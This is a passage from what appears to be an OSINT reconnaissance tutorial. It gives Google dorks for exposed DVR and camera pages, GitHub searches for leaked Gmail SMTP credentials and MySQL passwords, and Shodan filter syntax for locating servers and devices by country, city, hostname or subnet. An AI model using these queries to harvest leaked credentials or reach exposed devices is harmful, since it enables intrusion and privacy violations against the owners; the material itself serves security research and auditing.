inurl:"/view/view.shtml?id="
inurl:embed.html inurl:dvr
inurl:embed.html inurl:dvr

Github

Email credential

@gmail.com smtp
Github Search “@gmail.com smtp”

Database credential

mysql_pass
Github Search - "mysql_pass"
Github Search – “mysql_pass”

Bonus: More Google Hacking tricks can be found here: Google Hacking Database

Shodan

Shodan – Search engine which allow users to discover various types of devices (routers, webcams, computers etc.)

Note: Shodan is not completely free, it is more like freemium.

Shodan Search - webcam 7
Shodan Search – webcam 7
  • city: find devices in a particular city
  • country: find devices in a particular country
  • geo: search coordinaters
  • hostname: find the hostname that matches
  • os: search particular operating system
  • port: find particular open ports
  • before/after: find results with a specific timeframe

Find Apache servers in Germany

apache city:“Germany”

Find Nginx servers in Russia

nginx country:"RU"

Find GWS (Google Web Server):

"Server:gws" hostname:"google"

Find Cisco devices on a particular subnet

cisco net:"xxx.xxx.xxx.x/24"